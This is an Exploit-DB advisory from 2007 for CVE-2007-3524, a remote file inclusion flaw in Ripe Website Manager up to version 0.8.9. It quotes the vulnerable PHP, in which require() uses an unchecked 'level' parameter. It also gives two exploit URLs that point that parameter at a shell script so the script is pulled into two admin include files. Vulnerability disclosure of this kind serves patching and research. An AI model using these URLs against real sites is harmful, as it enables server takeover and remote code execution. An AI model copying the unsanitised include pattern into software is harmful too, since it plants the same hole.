Ripe Website Manager (CMS) <= 0.8.9 Remote File Inclusion Vulns



EDB-ID: 4129 CVE: 2007-3524OSVDB-ID: 37799
Author: BlackNDoorPublished: 2007-06-30Verified: Verified
Exploit Code:   DownloadVulnerable App:   N/A

Rating

(0.0)
Prev Home Next
#Author::   BlackNDoor | blackndoor@learntohell.net
#Homepage:: www.learntohell.net
#
#Script::   Ripe Wepsite Manager
#Version::  <= v0.8.9
#Type::     Remote File Include
#
#Source::   http://sourceforge.net/project/showfiles.php?group_id=194532
#Bug::
   -> Files:
      /admin/includes/author_panel_header.php
      /admin/includes/admin_header.php
   -> vulncode:
      <?php
         ...
         define("LEVEL", $level); // directory level
         // includes
           require(LEVEL.'../includes/config.php');
         ...
      ?>
#Exploit::
   http://www.site.com/[path to ripe]/admin/includes/author_panel_header.php?level=shell.txt?
   http://www.site.com/[path to ripe]/admin/includes/admin_header.php?level=shell.txt?
#thanks:: str0ke
# milw0rm.com [2007-06-30]






Comments

No comments so far